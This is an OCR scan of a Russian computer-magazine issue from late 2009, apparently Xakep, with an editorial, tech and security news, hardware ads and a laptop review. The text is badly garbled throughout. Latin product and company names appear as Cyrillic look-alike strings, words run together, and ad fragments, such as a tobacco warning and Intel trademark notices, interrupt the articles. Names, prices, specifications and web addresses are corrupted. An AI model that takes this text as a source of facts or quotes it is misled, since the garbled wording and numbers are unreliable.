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Листал только что декабрьские номера X за разные годы. Накопилось их немало: 9 штук, а этот номер, 
что ты держишь в руках, - десятый по счету. 

Когда X только появился, многие гнилостные люди прочили ему скорое закрытие. Но вот прошло 1 0 лет 
и Хакер - самый узнаваемый компьютерный журнал в России, воспитавший целое поколение технически 
творческих людей. И самое главное, несмотря на все кризисы и невзгоды, мы с большим оптимизмом 
смотрим вперед и планируем еще больше радовать тебя крутыми статьями, взломами и исследованиями 
в новом году :). Кстати, о празднике. 

Как ни относиться к нему, Новый год и 1 0 дней после него - суперское время для того, чтобы отдохнуть, 
уделить внимание близким и друзьям, запланировать и обдумать какое-то развитие на год-другой вперед. 
Желаю тебе именно этого: хорошего отдыха и больших планов по собственному росту и развитию. 

С новым годом! 

пікііогг, гл. ред. X 
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МАРИЯ «МІРК!У_» НЕФЕДОВА МІРРІИгаКЕАІ.ХАКЕР.Ри 



МЕ6АЫЕ№ 

ОБО ВСЕМ ЗА ПОСЛЕДНИЙ МЕСЯЦ 



ВАЗ ІЗТ РАМТАЗТІЗСН! 



Стивен Баллмер поведал о 
продажах ѴѴіпсІоѵѵз 7, фонтани- 
руя громкими эпитетами вроде 
«великолепно», «фантастически» 
и та к дал ее. Стив утверждает, что 
уже в первые недели выручка от 
продажновой ОСи превзошла не 
только все возможные ожидания, 
но и все доходы от продаж любой 
другой программной платформы 



МісгозоЙ. Конкретных цифр, впро- 
чем, Баллмер не называл, пока что 
ихза него называютаналитики. 
Так, например, по информации 
ЫРБ Огоир, продажи ПКв связи с 
выходом 7-ой удвоились, и спрос 
на ѴѴіпсІоѵѵз 7 в первые дни продаж 
превзошел спрос на ѴѴіпсІоѵѵз Ѵіз1;а 
на 234%! 



МСАРЕЕ ЗАФИКСИРОВАЛА НОВЫЙ АНТИРЕКОРД 
- В 3 КВАРТАЛЕ 2009 ОБЪЕМ СПАМА В 
МИРОВОМ ПОЧТОВОМ ТРАФИКЕ СОСТАВИЛ 
НЕБЫВАЛЫЕ 92% 




ЯНДЕКС ЗАКРЫВАЕТ РЕЙТИНГ БЛОГОВ 







В официальном блоге компании «Яндекс» появилась новость о решении, кото- 
рое явно далось нашим «поисковикам» нелегко. В декабре «Яндекс» закрыва- 
ет один раздел «Поиска по блогам», а именно — рейтинг популярных записей. 
Причины очевидны: рейтинг уже давно превратился в инструмент, в орудие 
и медийную площадку. Слишком много копий было сломано вокруг рейтинга, 
слишком много жалоб поступало, а искусственное «выведение постов в топ» 
уже и вовсе успело стать нормой и даже платной услугой. Все это настолько 
радикально отличалось от исходной задумки «Яндекса» (на который, разумеет- 
ся, сыпались все шишки, порожденные активностью блогеров], что компания 
приняла решение закрыть рейтинг и вместо него открыть АРІ Поиска по бло- 
гам. Благодаря последнему, каждый сможет составить собственный рейтинг 
популярных постов. Для тех, кого это новость расстраивает (есть такие?], име- 
ется «утешительный приз» — Тема Лебедев уже переселил рейтинг «Яндекса» 
ксебе;теперьонживетпо адресу: агЛебесІеѵ.гиЛооІз/Ыоаз . 



ИЗЯЩНОЕ РЕШЕНИЕ ОШ 



Новый телефон от компании І_0 ориентирован на 
пользователей, которые хотели бы иметьтелефон с 
сенсорным экраном, но без дополнительных, необя- 
зательных функций, которые лишьувеличивают сто- 
имость изделия. Модель І_6 60510 может похвастать 
3-дюймовым сенсорным дисплеем, доходящим почти 
до краев аппарата (разрешение 400x240 точек], что 
создает иллюзию цельного стекла, и полным набором 
коммуникационных, мультимедийных и развлека- 
тельных функций: ВІиеІюоіЛ, тісгоБО, РМ-радио, 



НТМБ-браузер и 3-мегапиксельная камера. В плюсы 
новинки также можно записать и весьма скромные 
габариты — 50x98x1 1 мм и всего 87 грамм веса. Кор- 
пус аппарата выполнен из шлифованного алюминия, 
и дизайн подчеркивается единственной кнопкой с 
различным функционалом (вызов/завершение звон- 
ка, вызов меню/отмена], который идентифицируется 
с помощью красной и зеленой подсветки. Но самым 
главным плюсом, конечно, остается цена — в магази- 
нах 60510 можно найти всего за 8.990 рублей. 
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ГАРМОНИЯ ВКУСА. 





ИЗМЕРЕНИЕ. 





РАЗВИТИЯ РОССИ 
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ог 



ГТ ь 



КУРЕНИЕ ВРЕДИТ ВАШЕМУ ЗДОРОВЬЮ 
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РС27 



И НИКТО НЕ УШЕЛ 
ОБИЖЕННЫМ 

Мы уже рассказывали отом, что шведские ребята Ник- 
лас Зеннстрем и Янус Фриис, бывшие владельцы Зкуре, 
продавшие свое детище еВау несколько лет назад за 
кругленькую сумму, попытались вернуть Зкуре обратно в 
судебном порядке, попутно заработав на этом денег. Права 
на технологию ЗоШсІ, на основе которой работаетЗкуре, 
оставались в руках Зеннестрема и Фрииса, и когда еВау 
отказался рассматривать их предложение о сделке, шведы 
принялисьтребовать по $75 млн. за каждый день«неле- 
гальной» работы сервиса. Стех пор прошло несколько 
месяцев и вот, хорошие новости — ситуация разрешилась 
миром. Очевидно, «шантажисты» не врали — патенты и 
права у них, в самом деле, имелись. Дело в том, еВау, гро- 
зившийся вообще переписать все с нуля и категорически 
отказывавшийся платить бизнесменам что-либо, в итоге, 
согласился на сделку — Зеннестрем и Фриис получили не 
только места в совете директоров, но 14%акций компании 
Зкуре. Коварство шведских прогеров не знает границ :). 




| -о 




НОВЫЙ ПРОТОКОЛ ІЛР 



Компания ВНГГоггеп! порадовала всех юзеров и 
провайдеров новым протоколом под названием 
иТР. Разработка призвана разгрузить каналы, 
избавив провайдеров от головной боли — теперь 
при обнаружении «заторов» в сети, прога сама 
будет снижать активность, давая поработать и 
всему остальному. Торрент-трафикдавно является 
проблемой и для самих пользователей, которые 



-И ВАШИМ, И НАШИМ 

частенько не могут нормально посидеть в сети из-за 
активности торрент-клиента, и для провайдеров, у 
которых падаетобщая скоростьсоединения.таккак 
все каналы забиты торрент-трафиком. На офици- 
альном сайте іДоггепСсот выложена бета-версия 
клиента, использующая технологию иТР. иТоггепІ: 2.0 
уже «обкатали» несколько десятков тысяч человек, и 
никаких нареканий пока не возникло. 



поданным Ок.ѴѴев, настоящим 

ВИРУСНЫМ «ХИТОМ» ОСЕНИ СТАЛ 
ОЧЕРЕДНОЙ ФЕЙКОВЫЙ АНТИВИРУС 
ТР0тРАКЕА1_ЕВТ. 




МЫШЬ ФРАНКЕНШТЕЙНА 

Кажется, чуваки из 0 реп ОШ се .от сошли сума. Чем еще 
объяснить их совместное с ѴѴагМоизе творение — 1 8-кнопоч- 
ную мышь ОрепСЖісеМоизе, страшную, каксмертный грех? 
Внешне девайс представляет собой классический «приветиз 
90-х», и с трудом удается поверить в то, что мышка не «шари- 
ковая». Но эксцентричный манипулятор, конечно, лазерный, 
он действительно обладает 18-ю программируемым кнопка- 
ми, а также 512 Кб флеш-памяти, джойстиком в духеХЬох и 
феерической ценой $75. Разработчики утверждают, что мышка 
должна понравиться профессиональным пользователям сво- 
бодного офисного пакета, ведь с ее помощью все можно делать 
буквально одним кликом. На деле монстр вряд ли заинтересует 
даже геймеров, которые частенько используют мыши с кучей 
дополнительных кнопок (например, для онлайновых забав). 
Дело в том, что дизайн устройства настолько неудобен, а кно- 
поктак много, что даже геймер, скорее, предпочтетчто-нибудь 
попроще и, конечно, более эргономичное. 



БРИТНИ ОПЯТЬ ВЗЛОМАЛИ. ВИДИМО, ЭТО КАРМА 



Похоже, Бритни Спирс скоро можно будет 
присудить какое-нибудьзваниетипа «самая 
взламываемая звезда в Сети». Хакеры в оче- 
редной раз добралисьдо аккаунтов певицы в 
ТѵѵіДеги МуЗрасе. Напомним, что ее микроблог 



ломали уже неоднократно — хакеры объявляли 
мисс Спирс мертвой, постили от ее имени опи- 
сание ее же собственных гениталий, атеперь 
порадовали фоловеров звезды записями в 
духе: «Я поклоняюсь дьяволу». А Бритни, между 



прочим, одна из наиболее популярных в ТѵѵіШег 
личностей — ее читают почти 4 миллиона 
человек. На данный моментаккаунты певицы 
уже восстановлены, и всезаписи, сделанные 
хакерами, удалены. 



► 006 
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Жесткий диск 500СВ 

Графический процессор 

512МВ ІМѴЮІА 6Т3250 
Приводы ОѴй-РІѴѴ, 
мулыиформатный СагсІ Веасіег 



Ф, 



* Цена приведена на 22.09.09 и может изменяться. Уточняйте у менеджеров магазина. 



Единая справочная: ( 495 ) 925 - 64-47 

Интернет-магазин: ілллллг.ісепЪег.ги иплплі.ІсвИор.ги 

к ж 



Адреса салонов-магазинов: 
м. «Бабушкинская» ул. Сухонская, 7 А 
м. «Владыкино» Алтуфьевское ш., 1 6 



м. «Беляево» ул. Миклухо-Маклая, 55 
м. «Улица 1905 года» ул. Мантулинская, 2 



ІпЪеІ, логотип ІпЪеІ, ІпТеІ Іпзісіе, ІпТеІ Соге и Соге являются товарными знаками на территории США и других стран. 
Для получения дополнительной информации о рейтинге процессоров ІпТеІ посетите сайт ѵѵѵѵѵѵ.іпЪеІ.ги/гаіііпд. 



Ищи знак 

Іпіеі 

Іпзісіе® 









Компьютер нового поколения 

РІ.ЕХТВОІМ 
Оиаиго 



на базе процессора 
ІпіеІ® Соге™ І5 серии 750 



Быстрее и дешевле! 

С момента начала производства в 2007 году компьютер РЬЕХТРСШ® ОиаПго постоянно 
совершенствовался, всегда оставаясь одним из наиболее сбалансированных домашних 
компьютеров на российском рынке. 

Пятое поколение РІ.ЕХТВОІМ^ ОиаВДго использует принципиально новые решения, которые 
позволяют говорить о нем не как об очередной модернизации, а скорее как о новом компьюте- 
ре в модельном ряду РІ.ЕХТВОІМ®. 

Благодаря интеллектуальной производительности нового процессора ІпЪеІ® Соге™ І5 серии 
750 вы ощутите потрясающую скорость вашего нового компьютера в многозадачных прило- 
жениях. Новый процессор ІпСеІ сам направит свои ресурсы туда, где они действительно необхо- 
димы. 



Процессор 

ІпЪеІ® Соге™ і5 серия 750 (4 ядра, 2,66 Ггц] 

Платформа 

боскеС 1156 6І6АВУТЕ 6А-Р55-1ЮЗ 
Память 46В ОйВЗ 



Графический процессор ІМѴЮІА СеРогсе 6ТЗ 250 имеет лучшую в классе производитель- 
ность при работе с НЮ графикой, поддерживает игровые эффекты ІМѴЮІА РНуеХ с 
бРЫ-ускорением, молниеносную обработку изображений и видео, а также полную поддержку 
ІМѴЮІА Зй ѴІ8Іоп, позволяющую играть в настоящем 
стереоскопическом 30. 

Все это, вместе с отличной оснащенностью и низкой ценой, делает РІ.ЕХТВОІМ^ ОиаТТго 
лучшим выбором 2010 года для тех, кто хочет приобрести действительно мощный и 
современный компьютер. И, конечно, хочет при этом ощутимо сэкономить. 



Корпорация Іпіеі не несет ответственность и не осуществляет проверку добросовестности или достоверности каких-либо утверждений или заявлений относительно 
конкретных компьютерных систем, упоминание о которых содержится в данном документе. 



©2009 г, Сеіегоп, Сеіегоп Іпзісіе, СепТгіпо, СепШіпо Іпзісіе, логотип Сепітіпо, Соге Іпзісіе, логотип ІпТеІ, ІпТеІ, ІпТеІ Соге, ІпТеІ Іпзісіе, логотип ІпТеІ Іпзісіе, ІпТеІ Ѵііѵ, ІпТеІ ѵРго, ІТапіит, 
ІТапіит Іпзісіе, РеггЕіит, Репііит Іпзісіе, Ѵііѵ Іпзісіе, ѵРго Іпзісіе, Хеоп, и Хеоп Іпзісіе являются товарными знаками права на которые принадлежат корпорации ІпТеІ на территории 
США и других стран. Все права защищены. Реклама, 
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ПАРА СЛОВ О ГРОМКИХ СДЕЛКАХ 



Стало известно, что на компанию Зсот 
нашелся покупатель — им станет компания 
НР, которая собирается приобрести одного из 
крупнейших производителей сетевого обо- 
рудования за $2.7 млрд. Для рынка сетевой 
инфраструктуры это станет одним из крупней- 
ших слияний за последние годы. Для НР же 
приобретение Зсот — лишняя возможность 
составить конкуренцию Сізсо. Поглощение 
уже одобрено советами директоров обеих 
компанией, и завершить сделку планируется в 
начале 2010 года. 

Тем временем, другое крупное слияние 
оказалось под угрозой — Огасіе никак не 



может завершить покупку Бип, и виной тому 
Еврокомиссия. Окончательное решение 
по этому вопросу должно быть вынесено 
19-го января 2010, но уже сейчас стало 
известно, что по предварительным оценкам 
Еврокомиссии, переход МуБОЕ, принад- 
лежащего Бип, в руки Огасіе — ведущего 
мирового разработчика СУБД — сильно 
усложняет дело и, вероятно, даже ставит под 
угрозу все сделку. Бип и Огасіе, в связи с этим, 
напоминают, что СУБД «Оракла» и МуБОБ, все 
же, не совсем похожие вещи, а проект МуБОБ 
не может никем контролироваться хотя бы по 
причине своей открытости. 




ПЕРВЫЙ 5ЕРѴІСЕ РАСК ДЛЯ Ш00ѴѴ5 7 СКОРЕЕ ВСЕГО. ПОЯВИТСЯ ОСЕНЬЮ 

2010 года. 



ПОЛУФИНАЛ АСМІСРС ЗАВЕРШЕН 




ДАМЧ ІгІЕ-таІюпаІ Соііедіаіе 
СІ ѴІ I I Ргодгагпгпіпд Сопіеві 



1 1 ноября в Санкт-Петербурге состоялся 
полуфинал АСМ ІСРС 2009-2010 (Междуна- 
родной студенческой олимпиады по про- 
граммированию]. В ходе полуфинала были 
выявлены победители, которые отправятся 
в Китай, чтобы принять участие в финале 
олимпиады. 

Первое место на ІЧЕЕВС, неожиданно для 
многих, заняла команда из Петрозаводска 



— Денисов, Николаевский и Николаевс- 
кий. Во время конкурса прогнозов за ребят 
из ПетрГУ не было подано ни одного голо- 
са! На втором месте команда Московского 
МГУ— Разенштейн, Корнаков, Гусаков, на 
третьем ребята из Санкт-Петербургского 
ГУИТМО — Ахи, Банных, Поромов. Позд- 
равляем их и другие команды-победители 
и желаем удачи в Китае! 



ВИДЕО НА У(ШШЕ ТЕПЕРЬ БУДЕТ ДОСТУПНО И В КАЧЕСТВЕ 1080Р ВСЕ ВИДЕО, 
КОТОРЫЕ ДО ЭТОГО БЫЛИ ЗАЛИТЫ В 1080Р ПЕРЕКОДИРУЮТ, И СКОРО ОНИ 
БУДУТ ДОСТУПНЫ ВО ВСЕЙ КРАСЕ. 



ПЕРВАЯ О 3.0 

Анонсы первых девайсов с поддержкой 
БІ5В З.Оуже появляются вовсю, какэто и 
было запланировано производителями. 
Вотподоспела и первая в мире БІ5В3.0 
флешка —устройство БирегБреесІ БІ5В3.0 
РАЮОгіѵе представила компания Бирег 
ТаІепіТесбпоІоду. Заявленная скорость 
передачи данных при подключении 
накопителя к порту БІБВ 3.0 будет равна 




200 Мб/с, что превосходитскорость БІБВ 
2.0 девайсов в 10 раз. Если же исполь- 
зовать еще и драйвер протокола БІАБ.то 
можно получить и все 320 Мб/с. Габариты 
устройства таковы: 95x37x13.5 мм. Нако- 
питель будет выпущен в трех вариантах 
объема — 32, 64 и 128 Гб. Продажи долж- 
ны начаться уже в этом месяце, но цена, к 
сожалению, до сих пор неизвестна. 



► 008 
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МЕ6АЫЕѴѴ5 




СУММАРНЫЙ ОБОРОТ СИСТЕМЫ «ЯНДЕКС. ДЕНЬГИ» 
ЗА ПРОШЕДШИЙ ГОД ВЫРОС В 1 .5 РАЗА. 

«ХАКИНТОШ» НЕ ПРОЙДЕТ 



МИР, ДРУЖБА, 
ЖЕЛЕЗКИ 

Весть о временном (или не очень? кто знает] 
перемирии пришла из стана двух «железных» 
гигантов — ІпТеІ и АМО. Обе компании распро- 
странили пресс-релизы, в которых сообщили, что 
наконец-то сумели придти к мирному соглашению. 
Холодная война междулидерами в области про- 
изводства железа длится уже много лет, взаим- 
ным претензиям и судебным искам нетчисла. 
Например, совсем недавно ІпТеІ приговорили к 
очередному огромному штрафу и обнародовали 
документы, подтвердившие, что компания предо- 
ставляла своим вендорам разнообразные бонусы 
и скидки, еслите взамен соглашались прекратить 
закупки товара у АМО вообще, или сократить их до 
5% от ассорти мента. Тем интереснее сейчас вы- 
глядят пресс-релизы, в которых Іпіеі и АМО сооб- 
щают, что отзывают все судебные иски друг против 
друга и обещаютзаняться кросслицензированием 
технологий друг друга. Іпіеіже отныне и вовсе 
собирается бороться со своим «заклятым другом» 
исключительно честными путями и обещает вы- 
платить АМО $1.25 млрд, «за все хорошее». 




Хитрые чуваки из компании РзуВіаг, которые первыми додумались официально продавать на территории США 
компы с Мае 05Х І_еорагсІ на борту (то есть, попросту говоря, с«хакинтошем»), проиграли Арріе в суде. Суд 
признал РвуВіаг виновной в нарушении целого ряда патентов и авторских прав, принадлежащих компании 
Арріе, а также в модификации ядра и, соответственно, во взломе ПО с целью получения коммерческой выгоды. 
И хотя РзуВіа г пытались сделать «ход конем» и даже подали встречный иск против Арріе, обвиняя Джобса 
и компанию в злоупотреблении положением на рынке Мас’ов, это не помогло. Встречный исксуд отклонил. 
Теперь РзуВіаг предстоит отвечать по всей строгости закона, если компания, конечно, не подастапелляцию, 
что, скорее всего, и произойдет. Все же, в США подобные «фокусы» не проходят. 





ПИРАТЫ ПРИЗНАЛИ СВОЕ ПОРАЖЕНИЕ 



Датская организация Апіірігаідгирреп, которая занимается 
борьбой с пиратством, официальнозаявила, что больше не 
собирается преследовать юзеров файлообменных сетей. 

Дело в том, что доказать факт нарушения пользователем 
авторских прав в Дании, похоже, становится почти невоз- 
можно. В прошлом году Апіірігаідгирреп уже проиграли 
четыре процесса в Верховном суде, потому что без поимки 
нарушителя на месте преступления, либо без признания его 
нарушителем, суд невозможен. И если с поимкой на месте 
все более или менее ясно (это просто нереально), то ситуа- 
цию с ІР-адресами, которые всегда служили неоспоримым 
доказательством, стоит пояснить. Оказывается, по мнению 
Министерства культуры страны, ІР-адрес может указать л ишь 
на подписчика на услугу доступа в интернет, но никакие на 
нарушителя. В итоге, Апіірігаідгирреп, не имеющие возмож- 
ности ловить пользователей за руку, в буквальном смысле, 
были вынуждены отказаться от преследований вовсе. 
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іпзісіё 



Высокая скорость выполнения 
любых задач. Ваш новый 
персональный компьютер. 



Процессоры ІпіеІ Соге 



і7 обеспечивают высочаи скорость работы персональных компьютеров. 



Ищи знак 

Іпіеі 

Іпзібе® 

V А 



Изящное решение 

сложных 



задач! 



Высокопроизводительные рабочие станции В-ЗІуІе СагЬоп АІ 851 на базе мощных процессоров Іпіеі® Соге™ І7 и с 
технологией Іпіеі® ѴѴігеІезз созданы для быстрого воплощения Ваших идей. Для безопасного подключения в любом месте! 

Сбалансированная вычислительная система обрабатывает до восьми вычислительных потоков одномоментно, что позволяет 
обгонять по производительности двухпроцессорные системы на базе четырехъядерных процессоров. Убедитесь сами, 
приобретайте Р-ЗІу I е СагЬоп АІ 851. Качество, вычислительная мощь и гибкость подключения гарантированы! 



Специальные условия для дилеров и системных интеграторов! 



За бесплатной консулыациейи по вопросам приобретения 
обращайтесь к нашим партнерам. Полный список партнеров 

на ѵѵѵѵѵѵ.г-зіуіе-сотриіегз.ги 



Техническая поддержка: ЗАО «Эр-Стайл Компьютере» 

Тел. : ( 495 ) 514 - 14-17 

Бесплатный телефон для России: 8 - 800 - 200 - 800-7 



К* * 8іу1е 

СОМРІІТЕК8 



СОРЕ 



Корпорация ІпТеІ © 2009 г. Все права защищены. ІпТеІ, логотип ІпіеІ, Іпіеі Соге и Соге являются товарными знаками на территории США и других стран. Реклама. 
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проверку добросовестности или достоверности каких-либо утверждений или заявлений относительно конкретных компьютерных систем, упоминание о которых 
содержится в данной рекламе. 








МЕ6АЫЕѴѴ5 



АПГРЕЙД ДЛЯ НЕТБУКОВ 

Обладателей нетбуков Азиз Еее РС наверняка порадуют 
новые 5 йй- накопители БаЬегТообз 54 от компании Асбѵе 
Мебіа РгобиФв. Новые 5й О оснащены интерфейсом 
5АТАЗ Гбит/с и полностью совместимы с моделями серий 
900, 900А, 901 и 1000, атакже с ѴѴіпбоѵѵз 7. ЗаЬегТооОа 54 
демонстрируют отличную скорость чтения — 130 Мб/с, что 
почти в 5 раз быстрее стандартных 5РР, которым комплек- 
туются Еее РС. Помимо хорошей скорости девайсы отлича- 
ются низким энергопотреблением, умением выравнивать 
нагрузки и управлять дефектными блоками. Всего будет 
выпущенотри модификации емкостью 16, 32 и 64 Гб, и их 
стоимость составит$59. 95, $99.95 и $169.95 соответствен- 
но. 





СПЕЦ ПО ВЗЛОМУ МОДЕМОВ ПОПАЛ 
В РУКИ ФБР 




УТЯЖЕЛЕННАЯ МЫШЬ 



ЗА ПЕРИОД С ИЮЛЯ 
ПО ОКТЯБРЬ 2009 

ГОДА В РОССИИ БЫЛО 
ВОЗБУЖДЕНО 156 
УГОЛОВНЫХ ДЕЛ ПО 
ФАКТУ ИСПОЛЬЗОВАНИЯ 
НЕЛИЦЕНЗИОННЫХ 
ПРОДУКТОВ АБОВЕ. 



В СШАарестовали и собираются судить 26-летнего эксперта по кабельным модемам Райана 
Харриса, известного под ником ОегЕпдеІ. Харрис не просто «очередной хакер», парень дейст- 
вительно признанный специалист, в частности, он является автором книжки Наскіпд бае СаЫе 
Мобет — очень полезного чтива о перепрошивке железок. Власти США, однако, имеютсвое 
мнение на этотсчет. ФБР очень не понравилась коммерческая деятельность БегЕпдеІ — его 
фирма ТС N 150 занималась продажей модифицированных девайсов и ПОдля их перепрошивки 
и «разгона» (можно было увеличить скорость в обход ограничений, установленных провайдером, 
плюс поменять МАС-адрес устройства]. Поданным ФБР, на продаже прошивок5ідта и 5ідта X, 
проги Віасксаі, а также хакнутых модемов МоЬгоІа 5игГЬоагб 51 00 Харрис успел сколотить более 
$1 млн. Его наработками пользовались хакеры со всего мира, чтоФБР, конечно, тоже не радовало. 
В итоге, теперь Харрису грозит до 20 лет лишения свободы и штраф в размере примерно $250.000. 



В продажу поступил интересный девайс для геймеров — мышь по имени 5тод от 
компании Огопе Оатіпд беаг. Грызун может похвастаться сразу рядом интересных 
фишек, первой из которых является возможность регулировки веса — в комплект 
входит шесть грузиков весом по 5 г. Корпус мыши эргономичен и выполнен ассимет- 
рично.такчто девайс, ксожалению, предназначен исключительнодля правшей. 

В целом, агрессивный дизайн «Смога» определенно станет бальзамом надушу 
любого игромана — боковые плоскости корпуса имеют ребристое резиновое пок- 
рытие, все 7+2 клавиши, конечно, программируются, а скролл имеет4 направления. 
Лазерный сенсор Аѵадо 9500, в свою очередь, обеспечит разрешение до 5040 брі, а 
керамические ножки — идеальное скольжение. Цена мыши составляет порядка 50 
евро. 
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МЕ6АЫЕѴѴ5 



НОВЫЕ ЛАУРЕАТЫ 
ГУГЛО-ПРЕМИИ 

Многим работодателям стоило бы поучиться у 
компании Соодіе — вотужкто незабываето сво- 
ихсотрудниках и своевременном их поощрении! 
В Соодіе существуетспециальная премия Соодіе 
РоипсІегзАѵѵагсІ, учрежденная лично Сергеем 
Брином и Ларри Пейджем. Отцы-основатели 
компании вольны распоряжаться ею по своему 
усмотрению, награждая особенно отличившихся. 
Премия представляет собой многомиллионный 
опцион акций, такчто получившие ее сотрудни- 
ки, по сути, становятся миллионерами. Соодіе 
РоипсІегзАѵѵагсІ уже удостоились команды, 
работавшие над сервисами Стаіі, АсІВепзеІог 
Сопіепі, Соодіе Марз итакдалее. Теперьже 
настал черед команды разработчиков браузера 
Соодіе СЬготе — более 30 миллионов активных 
пользователей и всенародная любовь, это весо- 
мые заслуги. Так что, можнотолько поздравить 
команду «Хрома» с заслуженной наградой. 




АНАЛИТИКИ МЕКСИКУ КЕ5ЕАКСН СООБЩАЮТ: В ТРЕТЬЕМ КВАРТАЛЕ 
2009 ШТЕЬ ОТГРУЗИЛА 81 .5% ОТ ОБЩЕМИРОВОГО ОБЪЕМА 
МИКРОПРОЦЕССОРОВ ДЛЯ ПК. 



О 3.0 И ЗАТА 6 ГБИТ/С ОТ АЗІЮ 



Компания А51І5, наконец-то, официально 
представила свою первую системную плату 
с поддержкой 115В 3.0 и 5АТА 6 Гбит/с — 
ей станет Р7Р55Б-Е. Новинка построена 
на наборе микросхем Іпіеі Р55 Ехргезз 
и предназначена для процессоров Іпіеі 
Соге І5 и І7 (Зоскеі БСА1 156]. «В комп- 
лекте» имеются: четыре БІММ-слота для 
оперативной памяти О Б РЗ -2200 , по паре 



слотов РСІ Ехргезз хі 6, РСІ Ехргезз хі и 
РСІ, шесть портов 5АТА II, два гигабит- 
ных Еідегпеі-контроллера, аудиокодек 
7.1 для вывода звука вНБАисІіо.а также 
шесть разъемов 115В 2.0 и порт ЕігеѴѴіге. 
Но главной особенностью платы, конечно, 
остаются два порта 5АТА III с пропускной 
способностью 6 Гбит/с (на контролле- 
ре Магѵеіі 9123] и два порта 115В 3.0 (на 



контроллере ІЧЕС 0720200Е1]. В целях 
ускорения передачи данных контроллеры 
сообщаются с чипсетом не напрямую, а че- 
рез специальный мост РБХ8613. Нельзя не 
отметить и систему пассивного охлажде- 
ния, обладающую крайне оригинальным и 
ярким дизайном. В продаже плата должна 
появиться до конца текущего года, но дан- 
ные о цене пока не разглашаются. 
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ДОБРЫЕ САМАРИТЯНЕ 
ХАКНУЛИ РАСЕВООК 

Группа неизвестных хакеров решила «облагодетельствовать» социальную сеть 
РасеЬоок, указав админам и пользователям на уязвимость юзер-групп. Спо- 
соб они для этого выбрали очень простой — было угнано более 300 групп, а их 
аватары заменены на картинку с надписью «Сопітоі Ѵоиг ІпТо». В профилях в то же 
время разместили послание, в котором хакеры «официально уведомляли», что 
группа взломана, и теперь с ней можно было бы сделать много разных гадостей, 
цитата: «например, переименовать в «Я поддерживаю права педофилов». Но 
вместо этого взломщики сообщили, что не хотят выставлять никого в дурном 
свете, а лишь призыва ют всех задуматься о безопасности в социальных медиа. 
Также они призвали общественность заходить на их сайт со п 1: го Іуо и г. і п ~Го . чтобы, 
так сказать, ознакомиться с проблемой поближе. Уже там хакеры поясняют, что 
фактически ничего не взламывают: «Группы РасеЬоок все страдают от одной 
глобальной уязвимости — если администратор группы ее покидает, то зарегист- 
рироваться в качестве нового админа может каждый. Так что, чтобы перехватить 
контроль над группой, достаточно лишь быстренько погуглить». Не совсем ясно, 
что именно нам предлагается погуглить, но суть, тем не менее, понятна. Реакция 
РасеЬоокуже последовала — хакеров заблокировали, чем те оказались возмуще- 
ны до глубины души. Они уверены, что РасеЬоок должен сказать имспасибо.ане 
молча забанить. Но администрация РасеЬоок, судя по всему, вообще не видит в 
случившемся никакой глобальной проблемы. Главное, по их мнению, что админы 
групп не имеют доступа ни к какой приватной информации и могут разве что 
редактировать сообщения, дискуссии, да инфу самой группы. 



% 

Ш 



СалЬЫ Ѵиіг Іл-Іа Анн 

ШК! Ш Вм кшКшт 



Ьйі Н* ч Ш*і) ими ШгіЪи «ГСагіЦ ІрШ і*ш 

М РЙІІ І Д 1 1 I 

Т)п ПИЛ I *» [РѴЕ‘1 л игіш |ЖІ аі гл* іі іп яі і іп коя )ѴН ікКм» 1 
ННрИЯ^Г. 




КОЛИЧЕСТВО ПРИЛОЖЕНИЙ 
В АРРЗТОКЕ НЕДАВНО 
ПЕРЕВАЛИЛО ЗА ОТМЕТКУ 



100.000 




Беспроводной маршрутизатор 802.11 N 
со встроенным АІЭ51.2+ модемом 



АЗІІЗ 05ЫѴІ13- 

лёгкая настройка 
и уникальная 
функциональность! 




• ѴѴі-Рі 300 Мбит/с, поддержка 802.11 п и 802. 11 Ь/д 

• 2 порта 115В 2.0 для совместного 
использования 115В накопителей и принтеров 

• А81І5 АЮізк - личный Интернет - файл - сервер 
без сложных настроек 

Всемирная гарантия 2 года ѴѴУѴѴѴ.ЭЗиЗ.Ш 

Дистрибьюторы: БЮРОКРАТ (495) 745-55-11; Коосіоо ТесЬпоІодіез (499) 256-17-31; 0С5 (495) 995-25-75; ОШІ (495) 22-11-' 



Адаптирован для России 

• Утилита для быстрой настройки беспроводной сети 

• Выбор настроек для большинства 
Российских провайдеров 




I; ПИРИТ-ДиСТрибуЦИЯ (495) 974-32-10; ТК1№ТУ-Е1-ЕСТК0М1СЗ ШѴѴ.ІГІ-ѲІ.Ш Іпзрігіпд Іппоѵаііоп • Регзізіепі РегТесІіоп 



Товар сертифицирован. На правах рекламы. 








РЕВВІІЛЛ 



ДЛЯ ВСЕХ 

ТЕСТИРОВАНИЕ НОУТБУКА АБЫЗ ІЛ.80Ѵ 

Линейка мобильных компьютеров А51І5 II б получиласьу производи- 
теля на редкость удачной. Модели этой серии предназначены в первую 
очередь для пользователей, которым важны такие характеристики, как 
время автономной работы, низкий вес и богатая функциональность. 
Недавно нам удалось испытать на деле все возможности одного из яр- 
чайших представителей серии. 




Сепігіпо 

іпзісіе 

Ищи знак 

ІпіеІ 

Іпзісіе 




ПЛАТФОРМА 

Прежде всего, хотелось бы начать знакомство не супаковки и 
внешнего вида, а с платформы, которая являет собой базис любой 
высокотехнологичной вычислительной системы. Ноутбук Ш_80Ѵ 
построен на базе современной процессорной технологии ІпіеІ® 
Сепігіпо® 2. ІІІ_80Ѵ использует в своей основе чипсет ІпіеІ® Сапііда 
0545, который поставляется для высокопроизводительных решений 
В качестве мозгового центра выступает процессор категории ІІІ_Ѵ — 



энергоэффективная модель ІпіеІ® Соге™ 2 Оио 5117300. Несмотря 
на то, что частота работы такого СРИ всего 1 ,3 ГГц, используемый 
камешек располагает двумя ядрами, а тепловой пакет ІпіеІ® Соге™ 2 
Оио 5117300 не превышает 10 Вт! Отсюда и столь высокие результаты 
при замере времени автономной работы. Ноутбуктакже может пох- 
вастаться наличием интегрированного графического контроллера 
ІпіеІ® СМА4500МНО, что дает дополнительные десятки минут работы 
в автономном режиме. 
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ХАРАКТЕРИСТИКИ А51І5 ІЛ-80Ѵ 

• Процессорная технология ІпіеІ® Сепігіпо® 2 

• Дисплей: 14”, 1366x768, глянцевый 

• Процессор: Іпіеі® Соге™ 2 Оио 5117300, 1 ,3 ГГц 

• Чипсет: Іпіеі 6545 

• Память: 2048 Мбайт йОРЗ-1 066 

• Видео: ЫѴЮІА ѲеРогсе Ѳ21 ОМ, 51 2 Мбайт + Іпіеі 
ѲМА4500МГЮ 

• Винчестер: 500 Гбайт, 5еада1:е 5Т9500325А5 , 
5АТА-ІІ, 5400 об/мин 

• Оптический привод: Т55Т Согр Т5-ІІ633А, ОѴО-РѴѴ 

